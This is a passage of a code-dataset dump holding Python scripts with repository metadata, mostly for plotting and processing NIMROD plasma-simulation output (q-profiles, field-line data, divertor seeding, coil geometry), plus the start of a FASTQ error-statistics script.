mid2<0:\n irho2=i\n mid3=(qg[files[0]][i]+3.)*(qg[files[0]][i+1]+3.)\n if mid3<0:\n irho3=i\n mid4=(qg[files[0]][i]+4.)*(qg[files[0]][i+1]+4.)\n if mid4<0:\n irho4=i\n break\n\n\nif plotprofs == 1:\n fig1,ax1=plt.subplots(1,2,figsize=(16,5))\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n\n plt.locator_params(axis='y',nbins=4)\n\n mup=[]\n for i in range(len(mu0_p[files[0]])):\n mup.append(100*mu0_p[files[0]][i])\n\n #ax1.set_title(r'$f$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax1[0].get_xticklabels(), fontsize=20)\n plt.setp(ax1[0].get_yticklabels(), fontsize=20)\n ax1[0].plot(rho[files[0]][:],mup,'b',label=r'$100\\times\\mu_0p$',lw=3,color='b')\n ax1[0].plot(rho[files[0]][:],abs(qg[files[0]][:]),'b',label=r'$abs(q)$',lw=3,color='r')\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax1[0].axvline(x=rho[files[0]][irho2],lw=3,color='g',ls='dashed',label=r'$q=2$')\n ax1[0].axvline(x=rho[files[0]][irho3],lw=3,color='m',ls='dashed',label=r'$q=3$')\n ax1[0].axvline(x=rho[files[0]][irho4],lw=3,color='orange',ls='dashed',label=r'$q=4$')\n\n #ax2=ax1.twinx()\n #ax2.plot(rho[files[0]][:],omgeb[files[0]][:],'b',label=r'$\\Omega_{E\\times B}$',lw=3,color='g')\n #ax1.plot(0,0,'b',label=r'$\\Omega_{E\\times B}$ v. $\\rho$',lw=3,color='g')\n\n ax1[0].axhline(y=1,lw=2,ls='dotted',color='k')\n\n\n ax1[0].legend(fontsize=15,loc=2,ncol=2)\n\n #ax2.yaxis.major.formatter._useMathText = True\n #ax2.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n #ax1[0].yaxis.offsetText.set_fontsize(16)\n\n\n\n #ax.set_xlim(0.6,0.8)\n ax1[0].set_ylim(0,5.5)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n\n\n #ax1.set_title(r'$f$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax1[1].get_xticklabels(), fontsize=20)\n plt.setp(ax1[1].get_yticklabels(), fontsize=20)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax1[1].axvline(x=rho[files[0]][irho2],lw=3,color='g',ls='dashed',label=r'$q=2$')\n ax1[1].axvline(x=rho[files[0]][irho3],lw=3,color='m',ls='dashed',label=r'$q=3$')\n ax1[1].axvline(x=rho[files[0]][irho4],lw=3,color='orange',ls='dashed',label=r'$q=4$')\n\n ax1[1].plot(rho[files[0]][:],omgeb[files[0]][:],'b',label=r'$\\Omega_{E\\times B}$',lw=5,color='b')\n\n\n ax1[1].axhline(y=0,lw=2,ls='dotted',color='k')\n\n ax1[1].yaxis.major.formatter._useMathText = True\n ax1[1].ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax1[1].yaxis.offsetText.set_fontsize(18)\n ax1[1].tick_params(axis='y',labelsize=20)\n\n\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax1[0].set_xlabel(r'$\\rho$',fontsize=26)\n ax1[1].set_xlabel(r'$\\rho$',fontsize=26)\n ax1[1].set_ylabel(r'$\\Omega_{E\\times B}$',fontsize=26)\n\n #plt.savefig('fgprofs2.png',bbox_inches='tight')\n\n\n plt.show()\n\n\n fig1=plt.figure(figsize=(12,12))\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n ax=fig1.add_subplot(331)\n plt.title(r'$f$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],frb[files[0]][:],'b',label=r'$f$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$f$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(332)\n plt.title(r'$\\mu_0 p$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],mu0_p[files[0]][:],'b',label=r'$\\mu_0p$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$mu_0p$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(333)\n plt.title(r'$q$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],qg[files[0]][:],'b',label=r'$q$')\n ax.axvline(x=rho[files[0]][irho2],color='g')\n ax.axvline(x=rho[files[0]][irho3],color='m')\n ax.axvline(x=rho[files[0]][irho4],color='orange')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$q$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(334)\n plt.title(r'$Mach$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],mach[files[0]][:],'b',label=r'${\\rm Mach}$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'${\\rm Mach}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(335)\n plt.title(r'$\\Omega_{E\\times B}$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],omgeb[files[0]][:],'b',label=r'$\\Omega_{E\\times B}$ v. $\\rho$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$\\Omega_{E\\times B}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(336)\n plt.title(r'$\\Omega_{\\nabla P}$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],omgp[files[0]][:],'b',label=r'${\\rm Mach}$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$\\Omega_{\\nabla P}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(337)\n plt.title(r'$n$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],n_den[files[0]][:],'b',label=r'$q$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$n$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(338)\n plt.title(r'$ln(Residual)$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],residual[files[0]][:],'b',label=r'$q$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$ln(Residual)$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n #plt.savefig('fgprofs1.png',bbox_inches='tight')\n\n plt.show()\n" }, { "alpha_fraction": 0.5871766209602356, "alphanum_fraction": 0.7345331907272339, "avg_line_length": 31.962963104248047, "blob_id": "4240ccaf6c324e996a2f73ff61404d7d78b41c8f", "content_id": "3d7e7317d7e0c8d533faab5c255798e66f5012a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 889, "license_type": "no_license", "max_line_length": 83, "num_lines": 27, "path": "/plotingScripts/nimflVisitConvert.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script reads a reads a nimfl.dat file and converts it to a plot 3D'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nimport os\n\nhomeDir = os.environ['HOME']\nrelDir = \"/SCRATCH/166439/03300_2_equilbria/19091201_vac_lphi5_fp_deg50/\"\n#relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_rmp_cfl_b/200000_50deg/\"\n#relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_restart/58000_50deg/\"\nrelDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_fresh/26000/\"\nfileName = \"nimfl0026000.dat\"\nplot3Dfile = \"nimfl0026000.3D\"\n\nfullFile = homeDir+relDir+fileName\nfullOutFile = homeDir+relDir+plot3Dfile\n\npssData = np.loadtxt(fullFile)\nprint(pssData.shape)\n\nf = open(fullOutFile, \"wt\")\nf.write(\"x y z value\\n\")\nfor ii in range(pssData.shape[0]):\n f.write(\"%g %g %g %g\\n\" % (pssData[ii,0],pssData[ii,1],0.0,pssData[ii,2]))\nf.close()" }, { "alpha_fraction": 0.7707736492156982, "alphanum_fraction": 0.7765042781829834, "avg_line_length": 22.33333396911621, "blob_id": "2c52a26527ab72c91479015015d4481c5f3317b4", "content_id": "5f47585e8ff6e038033cf22186884d0fe5ecde08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 349, "license_type": "no_license", "max_line_length": 86, "num_lines": 15, "path": "/surfmnNim2/surfmn2.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport sys\nimport xySliceClass as xy\nimport surfmnClass as mn\n\ndef main(argv):\n thisSurfmn=mn.SurfmnClass(argv)\n fields=xy.xyClass(thisSurfmn.xyFile,thisSurfmn.mx,thisSurfmn.my,thisSurfmn.pd,False)\n thisSurfmn.calcBmn(fields)\n thisSurfmn.plotBmn()\n print(thisSurfmn.xyFile)\n print(fields.ix.shape)\n\nmain(sys.argv[1:])" }, { "alpha_fraction": 0.5937665104866028, "alphanum_fraction": 0.6481775045394897, "avg_line_length": 26.05714225769043, "blob_id": "661a2fa299856dfdb07e607f0f00aff6d4ab1fbd", "content_id": "ffb5860796577053a07276be9febff608afbee63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1893, "license_type": "no_license", "max_line_length": 100, "num_lines": 70, "path": "/trip2Nim/tripInterpolate2.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "''' Intepolate B(R,Z,PHI) from one set of RZ points onto a second set.\n\n'''\n\n\nimport sys\nsys.path.insert(0, \"./\")\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nhome_dir = os.environ['HOME']\nscratch_dir = home_dir + \"/SCRATCH\"\nold_file_dir = scratch_dir + \"/nimruns/echowell_runs/heatwidthscaling/166439/03300/EF_GRID_18121801\"\nprobe_gb_file = old_file_dir + \"/166439.03300.probe_gb.out\"\nnew_rz_dir = scratch_dir + \"/166439/03300_2_equilbria/19061201\"\nnew_rz_file = new_rz_dir + \"/nimrod_bdry_rz.txt\"\n\nb_data = np.loadtxt(probe_gb_file,comments='%')\nnew_rz = np.loadtxt(new_rz_file,skiprows=1,delimiter=',')\n\nphi_RZ_slices = []\nphi_B_slices = []\nphi_values = []\nphi_last = -100\nfirst_phi = True\nfor ii in range(b_data.shape[0]):\n if first_phi:\n first_phi = False\n start_index = ii\n phi_last = b_data[ii,0]\n count=1\n phi_values.append(phi_last)\n elif b_data[ii,0] == phi_last:\n count+=1\n else:\n thisRZ = np.zeros([count-1,2])\n thisB = np.zeros([count-1,3])\n thisRZ[:,0] = b_data[start_index:ii-1,1]\n thisRZ[:,1] = b_data[start_index:ii-1,2]\n thisB[:,0] = b_data[start_index:ii-1,4] #BR\n thisB[:,1] = b_data[start_index:ii-1,5] #BZ\n thisB[:,2] = b_data[start_index:ii-1,3] #Bphi\n phi_RZ_slices.append(thisRZ)\n phi_B_slices.append(thisB)\n phi_values.append(phi_last)\n start_index = ii\n phi_last = b_data[ii,0]\n count=1\n\nii=b_data.shape[0]\nthisRZ = np.zeros([count-1,2])\nthisB = np.zeros([count-1,3])\nthisRZ[:,0] = b_data[start_index:ii-1,1]\nthisRZ[:,1] = b_data[start_index:ii-1,2]\nthisB[:,0] = b_data[start_index:ii-1,4] #BR\nthisB[:,1] = b_data[start_index:ii-1,5] #BZ\nthisB[:,2] = b_data[start_index:ii-1,3] #Bphi\nphi_RZ_slices.append(thisRZ)\nphi_B_slices.append(thisB)\nphi_values.append(phi_last)\n \nprint(count)\nprint(phi_values)\nprint(b_data.shape)\n\n\nfor rz in phi_RZ_slices:\n plt.plot(rz[:,0],rz[:,1])\nplt.show()" }, { "alpha_fraction": 0.4686756432056427, "alphanum_fraction": 0.5103092789649963, "avg_line_length": 30.524999618530273, "blob_id": "7f50ac5e721eaf9d8026b7a2e82851e38a3c89b5", "content_id": "302fea11e64f31e6b50f2ac0804349f4cccce040", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2522, "license_type": "no_license", "max_line_length": 79, "num_lines": 80, "path": "/nimflSeed/divSeedRun.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport numpy as np\nimport itertools as iter\nimport argparse\nimport pathlib\nimport subprocess\nfrom shutil import copy2\nimport os\n\nSEGMENTS = [\n ((1.016, 0.000), (1.016,-1.223)),\n ((1.016,-1.223), (1.153,-1.363)),\n ((1.153,-1.363), (1.372,-1.363)),\n ((1.372,-1.250), (1.682,-1.250))\n]\n\ndef write_start(file_name, rz, phi):\n npts = rz.shape[0]\n with open(file_name,'w') as thisFile:\n thisFile.write(str(npts)+\"\\n\")\n for idx, in np.ndindex(rz.shape[0]):\n thisLine = '{: 16.16e}'.format(rz[idx,0]) + \", \"\n thisLine+= '{: 16.16e}'.format(rz[idx,1]) + \", \"\n thisLine+= '{: 16.16e}'.format(phi) + \"\\n\"\n thisFile.write(thisLine)\n\ndef div_seed_runner(nimfl, dump, **kwargs):\n nphi = 360\n nl = 100\n dtan = 0.01\n phi_array = np.linspace(0, 2*np.pi, nphi, endpoint=False)\n BASENAME = \"start_positions.dat\"\n DIRNAME = \"temp_dir\"\n counter = 0\n for segment in SEGMENTS:\n start = np.array(segment[0])\n end = np.array(segment[1])\n tan = np.array([-end[1] + start[1], end[0] - start[0]])\n length = np.linalg.norm(tan)\n tan = dtan/length * tan\n l_arr = np.linspace(start,end,nl)\n l_arr = l_arr + tan\n for phi in np.nditer(phi_array):\n dir = DIRNAME + f\"_{counter}\"\n print(f\"Makeing dir {dir}\")\n try:\n os.mkdir(dir)\n except:\n print(f\"{dir} exists\")\n copy2(dump,dir)\n copy2('nimrod.in',dir)\n copy2('nimfl.in',dir)\n copy2('dmap_rz.dat',dir)\n #enter dir\n os.chdir(dir)\n file_name = BASENAME\n write_start(BASENAME, l_arr, phi)\n subprocess.run(nimfl)\n os.remove('nimrod.in')\n os.remove('nimfl.in')\n os.remove('dmap_rz.dat')\n os.remove(dump.name)\n os.chdir('../')\n counter += 1\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='NIMFL divertor plate runner')\n parser.add_argument('nimfl_exe',\n action='store',\n type=pathlib.Path,\n help=\"nimfl exectable path\" )\n parser.add_argument('dumpfile',\n action='store',\n type=pathlib.Path,\n help=\"dumpfile path\" )\n\n args = vars(parser.parse_args())\n\n div_seed_runner(args['nimfl_exe'], args['dumpfile'], **args)\n" }, { "alpha_fraction": 0.5931777358055115, "alphanum_fraction": 0.6217235326766968, "avg_line_length": 34.70512771606445, "blob_id": "6abb2f542bc2c9fc72fe08264e7f968136a1aa67", "content_id": "21c170c210a91d1619886e293acc9b854e5e6450", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5570, "license_type": "no_license", "max_line_length": 118, "num_lines": 156, "path": "/plotingScripts/qSurfaces.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport h5py\n#import surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nimport fsa\nfrom shutil import copy2\n#import nim_timer as timer\nimport f90nml\nimport eval_nimrod as eval\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline,griddata\nimport labellines as ll\nimport matplotlib.ticker as ticker\n\n\nimport matplotlib.colors as mcolors\n\n#uses labelines package: https://github.com/cphyc/matplotlib-label-lines/\n#pip3 install matplotlib-label-lines\n\ndef dummy_fsa(rzc,y,dy,evalnimrod,fargs):\n '''\n Dummy integrand for fsa, this is used to get and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=1.0\n return dy\n\n#@timer.timer_func\ndef get_qsurfaces(dumpfile,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n qlist=[-1.25, -1.50, -2.0, -3.0,-4.0]\n qlist2=[-1.125,-1.75,-2.5,-3.5]\n evalNimrod=eval.EvalNimrod(dumpfile,fieldlist='b')\n#\n dvar, yvar, contours = fsa.FSA(evalNimrod, rzo, dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic',fill_value=\"extrapolate\")\n Rq=interp1d(dvar[7,:iend], dvar[4,:iend], kind='cubic',fill_value=\"extrapolate\")\n Zq=interp1d(dvar[7,:iend], dvar[5,:iend], kind='cubic',fill_value=\"extrapolate\")\n\n contourdict={}\n for iq in qlist:\n iyvar, icontour = fsa.FSA(evalNimrod,rzo, dummy_fsa, 1, \\\n nsurf=1,depvar='eta',dpow=0.5,rzp=[Rq(iq),Zq(iq)],flag=eqflag,normalize=True, \\\n fargs=fargs)\n contourdict[iq]=icontour\n\n contourdict2={}\n for iq in qlist2:\n iyvar, icontour = fsa.FSA(evalNimrod,rzo, dummy_fsa, 1, \\\n nsurf=1,depvar='eta',dpow=0.5,rzp=[Rq(iq),Zq(iq)],flag=eqflag,normalize=True, \\\n fargs=fargs)\n contourdict2[iq]=icontour\n\n return contourdict, contourdict2\n\ndef q_runner(fileName,plot,pickle,args):\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_pre=[\"ntm\"]\n pickle_suf=[\"pickle\"]\n nimrodin=\"nimrod.in\"\n pre=fileName.split('.')[0]\n step=fileName.split('.')[1]\n if pre in dump_pre:\n print(f\"Performing ntm analysis from dump file\")\n # check for nimrod.in and hdf5 format\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n if not fileName.split('.')[-1] in dump_suf:\n print(f\"dump file is not hdf5 format\")\n raise IOError\n nsurf=args.get(\"nsurf\",150)\n fargs={}\n eqflag=args.get(\"eqflag\",1)\n print(fileName)\n qsurfaces, qsurfaces2=get_qsurfaces(fileName,rzo=np.array(args['rzo']),nsurf=nsurf,fargs=fargs)\n # timer.timer.print_times()\n\n #pickle data here\n if args['pickle']:\n pfile=pickle_pre[0]+'.'+str(step).zfill(5)+'.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n pass\n # ntm.dump(file)\n elif pre in pickle_pre:\n pass\n #print(\"pickle_pre\")\n #ntm=step.ntmstep(None,None)\n #ntm.load(file_name)\n #print(f\"Time: {ntm.time}\" )\n #ntm.plot_fsa_phase(key=None)\n# with open(file_name,'rb') as file:\n# surf=surfmn.fsasurfmn(None,None)\n# surf.load(file)\n else:\n #print(f\"File {file_name} is not a recognized file type\")\n raise IOError\n\n#plot data here\n if plot:\n xvals=[]\n llTune=8\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.title(\"Equilibrium q-surfaces\",size=16)\n for ii, [iq, isurface] in enumerate(qsurfaces.items()):\n plt.plot(isurface[0,:],isurface[1,:],label=f\"{iq}\",ls='-')\n xvals.append(isurface[0,int((3*ii)%llTune*isurface.shape[1]/llTune)])\n for ii, [iq, isurface] in enumerate(qsurfaces2.items()):\n plt.plot(isurface[0,:],isurface[1,:],ls='-',color='k', linewidth=1)\n plt.scatter( 1.76893653, -0.01890057, marker='.',color='k',s=4)\n ll.labelLines(plt.gca().get_lines(),xvals=xvals,fontsize=10)\n ax.set_xlabel(r\"R [m]\",size=16)\n ax.set_ylabel(r\"Z [m]\",size=16,rotation=90)\n ax.tick_params(axis='both', which='major', labelsize=16)\n ax.yaxis.set_major_locator(ticker.MultipleLocator(0.5))\n ax.xaxis.set_major_locator(ticker.MultipleLocator(0.5))\n #ax.set_xlim([1,2.5])\n plt.axis('equal')\n plt.tight_layout()\n plt.show()\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='plots eq q surfaces runner.')\n parser.add_argument('file',help='file name')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--nsurf', type=int, default=150, help=\"number of surfaces\")\n parser.add_argument('--eqflag', type=int, default=1, help=\"flag to add n=0 perturbation to eq\")\n parser.add_argument('--rzo',type=float, nargs=3, default=[1.768,-0.018831,0.0], help=\"intial guess for o-point\")\n args = vars(parser.parse_args())\n print(args)\n q_runner(fileName=args['file'],plot=args['plot'],\\\n pickle=args['pickle'],args=args)\n" }, { "alpha_fraction": 0.5234419703483582, "alphanum_fraction": 0.5628930926322937, "avg_line_length": 32, "blob_id": "dcea3aa23b9396432ef8ac6c44868d386065705b", "content_id": "01e58d44c4c4bb9d2d5c9a888ae60eb8d6bad4c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3498, "license_type": "no_license", "max_line_length": 71, "num_lines": 106, "path": "/biotSavart/coilClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n# coil class\n# \n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass coil:\n coilType=''\n coilId=0\n current=0.0\n segments=0\n xyz=np.zeros([0])\n def __init__(self,current,segment):\n self.current=current\n self.segments=segment\n self.xyz=np.zeros([3,self.segments+1])\n def planarCoil(self,x0,y0,z0,r,tx,ty,tz):\n #Initalize an coil around r0, with radius r\n # t1 and t2 are the rotation angles are the x0 and y0 axis\n\n self.coilType='planar'\n costx=np.cos(tx)\n costy=np.cos(ty)\n costz=np.cos(tz)\n sintx=np.sin(tx)\n sinty=np.sin(ty)\n sintz=np.sin(tz)\n rotxMat = np.zeros([3,3])\n rotyMat = np.zeros([3,3])\n rotzMat = np.zeros([3,3])\n \n rotxMat[0,0] = 1.0\n rotxMat[1,1] = costx\n rotxMat[1,2] = -sintx\n rotxMat[2,1] = sintx\n rotxMat[2,2] = costx\n\n rotyMat[0,0] = costy\n rotyMat[0,2] = sinty\n rotyMat[1,1] = 1.0\n rotyMat[2,0] = -sinty\n rotyMat[2,2] = costy\n\n rotzMat[0,0] = costz\n rotzMat[0,1] = -sintz\n rotzMat[1,0] = sintz\n rotzMat[1,1] = costz\n rotzMat[2,2] = 1.0\n\n rotMat = np.matmul(rotzMat,np.matmul(rotyMat,rotxMat))\n thisXYZ=np.zeros([3])\n theta=np.linspace(0,2*np.pi,num=self.segments+1)\n for iT, thisT in enumerate(theta):\n thisXYZ[0]= r * np.cos(thisT)\n thisXYZ[1]= r * np.sin(thisT)\n thisXYZ[2]= 0.0\n self.xyz[:,iT]=np.matmul(rotMat,thisXYZ)\n self.xyz[0,iT]+=x0\n self.xyz[1,iT]+=y0\n self.xyz[2,iT]+=z0\n# make sure the coil is periodic\n self.xyz[:,self.segments]=self.xyz[:,0]\n def cCoil(self,cCoilId):\n self.coilType='cCoil'\n self.coilId = cCoilId\n r0 = 3.2 #radius of C Coil\n zTop = 0.8 #C coils have a height of 1.6m\n zBottom = -0.8\n\n# I assume that the coils are composed of 4 segments\n# each has equal number of line segments. Test to see if the \n# number of segments is divisble by 4\n if(self.segments%4 !=0):\n sys.exit(\"c Coil segments must be divisble by 4\")\n segsPerSec = int(self.segments/4)\n\n phiStart = (-1.0 + (cCoilId-1) * 2.0)/(6.) *np.pi\n phiEnd = ( 1.0 + (cCoilId-1) * 2.0)/(6.) *np.pi\n phi=np.linspace(phiStart,phiEnd,num=segsPerSec+1)\n z =np.linspace(zBottom, zTop, num=segsPerSec+1)\n for ii in range(segsPerSec):\n#top\n self.xyz[0,ii] = r0 * np.cos(phi[ii])\n self.xyz[1,ii] = r0 * np.sin(phi[ii])\n self.xyz[2,ii] = zTop\n#right\n self.xyz[0,ii+segsPerSec]=r0 * np.cos(phiEnd)\n self.xyz[1,ii+segsPerSec]=r0 * np.sin(phiEnd)\n self.xyz[2,ii+segsPerSec]=z[segsPerSec-ii]\n#bottom\n self.xyz[0,ii+2*segsPerSec]=r0 * np.cos(phi[segsPerSec-ii])\n self.xyz[1,ii+2*segsPerSec]=r0 * np.sin(phi[segsPerSec-ii])\n self.xyz[2,ii+2*segsPerSec]=zBottom\n#left\n self.xyz[0,ii+3*segsPerSec]=r0 * np.cos(phiStart)\n self.xyz[1,ii+3*segsPerSec]=r0 * np.sin(phiStart)\n self.xyz[2,ii+3*segsPerSec]=z[ii]\n self.xyz[:,self.segments]=self.xyz[:,0]\n def plot_coil(self,axis):\n axis.plot(self.xyz[0,:],self.xyz[1,:],self.xyz[2,:])\n\n def plot_2D_coil(self,axis,coilcolor):\n axis.plot(self.xyz[0,:],self.xyz[2,:],color=coilcolor)\n" } ]
78
jeffreywolf/expectedError
https://github.com/jeffreywolf/expectedError
4da2d5bfbee07ab194f5b82e1e8feb89dc0da69a
648d2b6deae2e401d22f59e3203cea5c148c30b4
92f1f02ae32c4faa5028e6b6f7030968b211d17d
refs/heads/master
2016-08-04T21:03:48.251509
2015-01-19T17:29:19
2015-01-19T17:29:19
29,446,342
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5912795662879944, "alphanum_fraction": 0.6055419445037842, "avg_line_length": 18.322834014892578, "blob_id": "cc9bcc5aa40f1ae593a74f7ee361bfc934d1f518", "content_id": "9ae149c16ddd344cc5c71db01f78059415168100", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2454, "license_type": "permissive", "max_line_length": 64, "num_lines": 127, "path": "/emax_threshold.py", "repo_name": "jeffreywolf/expectedError", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\"\"\"\nE statistics thresholds summary\n\"\"\"\nfrom Bio import SeqIO\nimport re\nimport os\nimport glob\nimport argparse\nimport numpy as np\nimport csv\n\n\ndef getArgs():\n\tparser = argparse.ArgumentParser(\n\t\tdescription = \"E statistics summary.\"\n\t)\n\tparser.add_argument(\n\t\t\"-i\",\n\t\t\"--input\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Input file fastq\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-o\",\n\t\t\"--output\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Output 